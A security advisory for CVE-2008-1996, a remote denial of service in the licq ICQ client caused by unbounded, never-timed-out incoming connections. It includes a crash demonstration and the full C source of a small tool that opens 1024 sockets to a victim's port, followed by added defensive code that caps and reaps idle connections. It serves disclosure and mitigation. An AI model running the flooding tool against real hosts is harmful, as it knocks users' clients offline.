SecurityReason.com - Our Reason is Security

Topic : licq remote DoS

SecurityAlert : 3851
CVE : CVE-2008-1996
SecurityRisk : Low
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : Milen Rangelov
Published : 03.05.2008

Affected Software : licq

Advisory Content :

Hello,

Licq is a Linux Qt-based ICQ client. There is a vulnerability in the way
licq processes new incoming TCP connections which can be exploited by a
remote attacker to crash the client.

When executed, licq opens a listening socket on a random port (AFAIK
between 30000 and 65000). There is no host-based authentication, so any
remote host can connect to it. Those connections are not closed by licq
after a given timeout period.

When all available file descriptors are exhausted (on most Linux
installations non-root users are limited to 1024; see ulimit -n), a
new incoming TCP connection causes licq to crash.

Here is an example:

We run licq:
gat3way@gat3way:~$ licq

From another console, we find out the port licq is listening on (we'd
need to portscan if the target is on a remote system):

gat3way@gat3way:/tmp$ lsof |grep licq|grep LISTEN
licq 10783 gat3way 9u IPv4 35993218 TCP *:52259 (LISTEN)

Now we run our "evil" denial of service code:
gat3way@gat3way:/tmp$ ./licq-break 127.0.0.1 52259
ip=127.0.0.1
done!

and go back to the console on which we ran licq...oops..

Licq Segmentation Violation Detected.
Backtrace (saved in /home/gat3way/.licq//licq.backtrace):
licq(licq_handle_sigabrt+0x2b4) [0x80f68d4]
[0xffffe420]
/lib/libc.so.6(abort+0x101) [0xb7b17811]
licq [0x80f6b1d]
[0xffffe420]
licq(_Z18MonitorSockets_tepPv+0x3ca) [0x80c907a]
/lib/libpthread.so.0 [0xb7d9e383]
/lib/libc.so.6(clone+0x5e) [0xb7bc173e]
Attempting to generate core file.
....

The source of licq-break (nothing particular, just connects MAX sockets
to a certain port at the victim's host):
-------------------------

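#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_aton() */

// change to suit your needs
#define MAX 1024

int fds[MAX];

int main(int argc, char *argv[])
{
    int port, a;
    char host[INET_ADDRSTRLEN];   /* room for a full dotted-quad address plus NUL */
    struct sockaddr_in victim;

    if (argc != 3)
    {
        printf("usage: %s <ip> <port>\n", argv[0]);
        exit(1);
    }

    port = atoi(argv[2]);
    snprintf(host, sizeof(host), "%s", argv[1]);   /* bounded copy of the address */
    printf("ip=%s\n", host);

    /* the destination is the same for every connection */
    memset(&victim, 0, sizeof(victim));
    victim.sin_family = AF_INET;
    victim.sin_port = htons(port);
    inet_aton(host, &victim.sin_addr);

    /* open MAX connections to the port and leave them open */
    for (a = 0; a < MAX; a++)
    {
        fds[a] = socket(PF_INET, SOCK_STREAM, 0);
        connect(fds[a], (struct sockaddr *)&victim, sizeof(victim));
    }

    printf("done!");
    return 0;
}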
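
The two conditions described above, connections that are never timed out and a crash once descriptors run out, can both be handled on the listening side. The following C code is an added example, not licq's code or its actual fix; MAX_PENDING, IDLE_SECS and all function names are assumptions. It caps the number of not-yet-authenticated connections, closes silent ones after a timeout, and treats descriptor exhaustion in accept() as a refusal.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/socket.h>
#include <time.h>
#include <unistd.h>

#define MAX_PENDING 64  /* assumed cap, far below the 1024-descriptor limit */
#define IDLE_SECS   30  /* assumed time a peer gets to send a valid packet */

struct pending { int fd; time_t since; };
static struct pending tab[MAX_PENDING];  /* connections not yet authenticated */
static size_t ntab;

/* Close every tracked connection that has been silent for IDLE_SECS. */
size_t reap_idle(time_t now)
{
    size_t closed = 0, i = 0;
    while (i < ntab) {
        if (now - tab[i].since < IDLE_SECS) { i++; continue; }
        close(tab[i].fd);
        tab[i] = tab[--ntab];  /* swap-remove, then re-check slot i */
        closed++;
    }
    return closed;
}

/* Track a freshly accepted fd; when the table is full, close it instead.
 * Returns 0 if tracked, -1 if refused. */
int admit(int fd, time_t now)
{
    reap_idle(now);
    if (ntab == MAX_PENDING) {
        close(fd);
        return -1;
    }
    tab[ntab++] = (struct pending){ fd, now };
    return 0;
}

/* accept() wrapper: running out of descriptors is a refusal (-1), not a
 * reason to abort; -2 reports a broken listening socket. */
int accept_bounded(int lfd, time_t now)
{
    int fd = accept(lfd, NULL, NULL);
    if (fd >= 0)
        return admit(fd, now);
    return (errno == EMFILE || errno == ENFILE || errno == EINTR) ? -1 : -2;
}
```

A connection that goes on to send a valid packet would be taken out of the table without being closed, so the cap applies only to peers that have not yet proven themselves.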





